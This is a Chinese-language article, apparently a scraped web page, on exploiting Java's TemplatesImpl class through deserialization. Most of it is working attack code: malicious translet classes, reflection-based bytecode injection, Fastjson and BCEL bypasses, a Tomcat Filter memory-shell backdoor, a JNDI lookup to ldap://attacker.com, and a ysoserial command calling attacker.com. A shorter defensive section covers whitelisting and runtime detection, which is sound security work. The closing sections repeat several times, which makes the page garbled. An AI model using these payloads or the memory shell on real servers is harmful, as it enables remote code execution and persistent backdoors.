Java TemplatesImpl深度利用技术详解<\/h1>

一、核心原理<\/h2>

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/code>是JDK内置的XSLT处理器类，其defineTransletClasses()<\/code>方法允许加载自定义字节码。攻击者通过反序列化构造特殊对象，触发恶意类加载和执行。<\/p>

核心方法调用链<\/strong>:<\/p>

TemplatesImpl.newTransformer() 
→ getTransletInstance() 
→ defineTransletClasses() 
→ ClassLoader.defineClass() \/\/ 加载恶意字节码
<\/code><\/pre>
二、基础利用案例<\/h2>
1. 手动构造攻击链<\/h3>
\/\/ 生成恶意字节码(示例弹出计算器)
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> EvilTemplate<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> \/* 异常处理 *\/<\/span> }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers)<\/span> {}<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler)<\/span> {}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 编译并获取字节码
<\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> evilCode =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"EvilTemplate.class"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>2. 反射注入字节码<\/h3>
TemplatesImpl templates =<\/span> TemplatesImpl.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用反射设置关键字段
<\/span><\/span><\/span><\/span>setField(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>evilCode});<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Exploit"<\/span>);<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 触发类加载
<\/span><\/span><\/span><\/span>templates.<\/span>newTransformer<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>反射工具方法<\/strong>:<\/p>
void<\/span> setField<\/span>(<\/span>Object obj,<\/span> String fieldName,<\/span> Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>    field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>三、绕过技巧<\/h2>
1. JDK高版本适配(JDK 8u71+)<\/h3>
问题<\/strong>: JDK 8u71+修复了AnnotationInvocationHandler的漏洞入口，传统CC链失效。<\/p>
解决方案<\/strong>:<\/p>

使用TemplatesImpl直接加载字节码：通过构造_bytecodes<\/code>字段的恶意类，直接触发defineTransletClasses<\/code>，无需依赖其他链式调用。<\/li>
结合BCEL编码：通过BCEL(Apache Commons BCEL)将恶意类编码为字符串形式，避免直接使用.class文件触发检测。<\/li>
<\/ul>
\/\/ 通过BCEL加载绕过类名检查
<\/span><\/span><\/span><\/span>String bcelCode =<\/span> "
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>BCEL$生成的BCEL字节码"<\/span>;<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bytecode =<\/span> com.<\/span>sun<\/span>.<\/span>org<\/span>.<\/span>apache<\/span>.<\/span>bcel<\/span>.<\/span>internal<\/span>.<\/span>classfile<\/span>.<\/span>Utility<\/span>.<\/span>decode<\/span>(<\/span>bcelCode,<\/span> true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造特殊类名绕过黑名单
<\/span><\/span><\/span><\/span>setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>);<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytecode});<\/span>
<\/span><\/span><\/code><\/pre>2. 绕过Fastjson私有属性限制<\/h3>
关键参数<\/strong>: Feature.SupportNonPublicField<\/code><\/p>
JSON.<\/span>parseObject<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>,<\/span> Feature.<\/span>SupportNonPublicField<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>默认情况下，Fastjson无法反序列化私有属性(如_bytecodes<\/code>)。通过添加该参数，可强制反序列化私有字段。<\/p>
绕过_tfactory空指针<\/strong>:

设置_tfactory<\/code>为空对象{}<\/code>，Fastjson会调用其无参构造函数生成默认的TransformerFactoryImpl实例，避免因空指针导致流程终止。<\/p>
四、内存马注入<\/h2>
Tomcat Filter型内存马<\/h3>
public<\/span> class<\/span> MemShell<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        WebappClassLoaderBase classLoader =<\/span> (<\/span>WebappClassLoaderBase)<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>        StandardContext context =<\/span> (<\/span>StandardContext)<\/span> classLoader.<\/span>getResources<\/span>().<\/span>getContext<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 注入Filter配置
<\/span><\/span><\/span><\/span>        FilterDef filterDef =<\/span> new<\/span> FilterDef();<\/span>
<\/span><\/span>        filterDef.<\/span>setFilterName<\/span>(<\/span>"evilFilter"<\/span>);<\/span>
<\/span><\/span>        filterDef.<\/span>setFilterClass<\/span>(<\/span>this<\/span>.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span>
<\/span><\/span>        context.<\/span>addFilterDef<\/span>(<\/span>filterDef);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 添加URL映射
<\/span><\/span><\/span><\/span>        FilterMap filterMap =<\/span> new<\/span> FilterMap();<\/span>
<\/span><\/span>        filterMap.<\/span>setFilterName<\/span>(<\/span>"evilFilter"<\/span>);<\/span>
<\/span><\/span>        filterMap.<\/span>addURLPattern<\/span>(<\/span>"\/*"<\/span>);<\/span>
<\/span><\/span>        context.<\/span>addFilterMap<\/span>(<\/span>filterMap);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>实现逻辑<\/strong>: 在恶意类的静态代码块中，通过反射向当前Tomcat上下文注入自定义Filter，实现持久化后门。<\/p>
Spring Controller型内存马<\/h3>
利用Spring动态注册机制: 通过反射修改RequestMappingHandlerMapping<\/code>，注册恶意Controller，拦截特定路径请求。<\/p>
五、防御对抗<\/h2>
1. 反序列化防护<\/h3>
白名单校验<\/strong>: 使用ValidatingObjectInputStream<\/code>限制反序列化的类:<\/p>
\/\/ 安全的反序列化实现
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> SafeObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> Set<<\/span>String><\/span> ALLOWED_CLASSES =<\/span> Set.<\/span>of<\/span>(<\/span>"java.lang.String"<\/span>,<\/span> "java.util.HashMap"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> SafeObjectInputStream<\/span>(<\/span>InputStream in)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        super<\/span>(<\/span>in);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        if<\/span> (!<\/span>ALLOWED_CLASSES.<\/span>contains<\/span>(<\/span>desc.<\/span>getName<\/span>()))<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized class: "<\/span>,<\/span> desc.<\/span>getName<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. RASP防护(运行时检测)<\/h3>

监控defineClass调用<\/strong>: 通过Java Agent拦截ClassLoader.defineClass<\/code>，检测非法字节码加载行为。<\/li>
Hook关键方法<\/strong>: 监控TemplatesImpl.newTransformer()<\/code>和getTransletInstance()<\/code>的调用栈。<\/li>
<\/ul>
\/\/ 使用Java Agent检测defineClass
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> ClassDefineMonitor<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> premain<\/span>(<\/span>String args,<\/span> Instrumentation inst)<\/span> {<\/span>
<\/span><\/span>        inst.<\/span>addTransformer<\/span>((<\/span>loader,<\/span> className,<\/span> classBeingRedefined,<\/span> protectionDomain,<\/span> classfileBuffer)<\/span> -><\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>className.<\/span>contains<\/span>(<\/span>"Evil"<\/span>))<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> SecurityException(<\/span>"Detected malicious class: "<\/span> +<\/span> className);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            return<\/span> classfileBuffer;<\/span>
<\/span><\/span>        },<\/span> true<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>六、混合利用技巧<\/h2>
1. 结合JNDI注入<\/h3>
当目标环境存在JNDI注入漏洞(如Log4j2)时，通过TemplatesImpl触发远程类加载，绕过本地字节码检测，直接加载远程恶意类。<\/p>
\/\/ 生成包含JNDI触发的字节码
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> JNDILoader<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            new<\/span> InitialContext().<\/span>lookup<\/span>(<\/span>"ldap:\/\/attacker.com\/Exploit"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>NamingException e)<\/span> {<\/span> \/* 异常处理 *\/<\/span> }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造嵌套攻击链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> chain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>templates),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>2. 结合Fastjson漏洞<\/h3>
{
<\/span><\/span>    "@type"<\/span>: "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>,
<\/span><\/span>    "_bytecodes"<\/span>: ["BASE64_ENCODED_BYTECODE"<\/span>],
<\/span><\/span>    "_name"<\/span>: "Exploit"<\/span>,
<\/span><\/span>    "_tfactory"<\/span>: {},
<\/span><\/span>    "_outputProperties"<\/span>: {}
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. Fastjson + TemplatesImpl + Groovy链<\/h3>
利用Groovy的MethodClosure: 通过Groovy闭包触发命令执行，结合TemplatesImpl加载恶意字节码，形成多链组合攻击:<\/p>
Transformer[]<\/span> groovyChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>new<\/span> MethodClosure(<\/span>"calc"<\/span>,<\/span> "execute"<\/span>)),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"call"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>七、实战检测命令<\/h2>
字节码生成工具<\/h3>

Javassist\/ASM: 动态构造符合AbstractTranslet规范的恶意类。<\/li>
Ysoserial扩展: 自定义Gadget链生成TemplatesImpl专用Payload。<\/li>
<\/ul>
漏洞检测脚本<\/h3>

基于堆内存分析: 通过jmap和jhat分析内存中的恶意类实例。<\/li>
流量特征检测: 监控Fastjson请求中是否包含_bytecodes<\/code>和@type<\/code>关键字。<\/li>
<\/ul>
# 使用ysoserial生成TemplatesImpl payload<\/span>
<\/span><\/span>java -jar ysoserial.jar Jdk7u21 "curl http:\/\/attacker.com"<\/span> > payload.bin
<\/span><\/span>
<\/span><\/span># 发送到测试服务<\/span>
<\/span><\/span>curl -X POST --data-binary @payload.bin http:\/\/vuln-app\/deserialize
<\/span><\/span>
<\/span><\/span># 内存马检测命令<\/span>
<\/span><\/span>jmap -dump:live,format=<\/span>b,file=<\/span>heapdump.bin <pid>
<\/span><\/span>jhat heapdump.bin # 分析堆中的恶意Filter<\/span>
<\/span><\/span><\/code><\/pre>关键审计点与防御建议<\/h2>
代码审计关注点:<\/h3>
ObjectInputStream.<\/span>readObject<\/span>()<\/span>
<\/span><\/span>XMLDecoder.<\/span>readObject<\/span>()<\/span>
<\/span><\/span>JSON.<\/span>parseObject<\/span>(<\/span>input,<\/span> Feature.<\/span>SupportNonPublicField<\/span>)<\/span> \/\/ 敏感调用
<\/span><\/span><\/span><\/span>ClassLoader.<\/span>defineClass<\/span>()<\/span>
<\/span><\/span>TemplatesImpl.<\/span>newTransformer<\/span>()<\/span>
<\/span><\/span><\/code><\/pre>防御策略:<\/h3>

升级至JDK 8u191+(限制defineClass的使用)<\/li>
使用SerialKiller等安全反序列化库<\/li>
开启SecurityManager并配置严格策略<\/li>
监控defineClass和newTransformer的调用<\/li>
<\/ol>
总结与演进方向<\/h2>
演进趋势:<\/h3>
从单一链式利用向多漏洞链组合发展(如JNDI + TemplatesImpl)。<\/p>
防御重点:<\/h3>

强化字节码加载监控<\/li>
禁用非必要反射操作<\/li>
严格校验反序列化输入<\/li>
<\/ul>
工具推荐:<\/h3>

检测: CodeQL定制规则分析defineClass调用路径<\/li>
防护: OpenRASP或Contrast Security实现运行时保护<\/li>
<\/ul>

Java TemplatesImpl深度利用技术详解<\/h1>

二、基础利用案例<\/h2>

三、绕过技巧<\/h2>

六、混合利用技巧<\/h2>

七、实战检测命令<\/h2>

关键审计点与防御建议<\/h2>

总结与演进方向<\/h2>

演进趋势:<\/h3> 从单一链式利用向多漏洞链组合发展(如JNDI + TemplatesImpl)。<\/p>

防御重点:<\/h3> 强化字节码加载监控<\/li> 禁用非必要反射操作<\/li> 严格校验反序列化输入<\/li> <\/ul> 工具推荐:<\/h3> 检测: CodeQL定制规则分析defineClass调用路径<\/li> 防护: OpenRASP或Contrast Security实现运行时保护<\/li> <\/ul>

工具推荐:<\/h3> 检测: CodeQL定制规则分析defineClass调用路径<\/li> 防护: OpenRASP或Contrast Security实现运行时保护<\/li> <\/ul>

演进趋势:<\/h3>
从单一链式利用向多漏洞链组合发展(如JNDI + TemplatesImpl)。<\/p>

防御重点:<\/h3>

强化字节码加载监控<\/li>
禁用非必要反射操作<\/li>
严格校验反序列化输入<\/li> <\/ul>
工具推荐:<\/h3>

检测: CodeQL定制规则分析defineClass调用路径<\/li>
防护: OpenRASP或Contrast Security实现运行时保护<\/li> <\/ul>

工具推荐:<\/h3>

检测: CodeQL定制规则分析defineClass调用路径<\/li>
防护: OpenRASP或Contrast Security实现运行时保护<\/li> <\/ul>